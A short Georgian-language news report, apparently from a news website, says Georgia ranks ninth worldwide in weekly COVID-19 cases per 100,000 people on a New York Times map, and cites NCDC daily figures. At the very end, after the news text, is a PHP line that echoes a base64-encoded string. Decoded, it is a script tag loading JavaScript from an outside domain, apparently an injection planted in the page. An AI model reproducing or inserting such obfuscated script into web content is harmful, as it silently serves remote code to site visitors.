celsiusi
ავერსი შნაიდერი
New York Times-ის კორონავირუსის მსოფლიო რუკის მიხედვით, ბოლო 1 კვირის მონაცემებით, საქართველო 100 000  მოსახლეზე კორონავირუსის გავცელების შემთხვევებით მსოფლიოში მეცხრე ადგილზეა.
 
ამერიკული გამოცემის მონაცემების მიხედვით, საქართველოში ბოლო შვიდი დღის განმავლობაში ახალი ინფიცირების შემთხვევათა რიცხვი საშუალოდ 2 496-ია, რაც 100 000 სულ მოსახლეზე 67 ახალ შემთხვევას გულისხმობს. აღნიშნული რიცხვი იანგარიშება ქვეყნის მოსახლეობის რაოდენობის ბოლო შვიდი დღის განმავლობაში ახალ შემთხვევათა საშუალო არითმეტიკულ რიცხვზე შეფარდებით.
 
საქართველოზე ცუდი შედეგები, ბოლო 7 დღის მონაცემებით, აქვთ კუბას, სეიშელის კუნძულებს, ნორმანდიის კუნძულებს, გიბრალტარს, ბრიტანეთის ვირჯინიის კუნძულები, ყაზახეთის და ფიჯის, ყველაზე უარესი მდგომარეობა კი კუნძულ მენზეა.
 
ბოლო ორი კვირის განმავლობაში საქართველოში კორონავირუსის შემთხვევების რაოდენობა 102%-ით გაიზარდა.
 
100 000 მოსახლეზე სიკვდილობის მაჩვენებლით კი საქართველო ბოლო ერთი კვირის მონაცემებით მსოფლიოში მე-17 ადგილზეა.
 
საქართველოს დაავადებათა კონტროლის ეროვნული ცენტრის (NCDC) მონაცემებით, ბოლო 24 საათში კორონავირუსის 2 796 ახალი შემთხვევა გამოვლინდა, გარდაიცვალა 17 ადამიანი. 28 ივლისის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 6.71 %, ბოლო 14 დღის მანძილზე – 6.73 %, ხოლო 7 დღის მანძილზე – 7.0 %.
1064
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");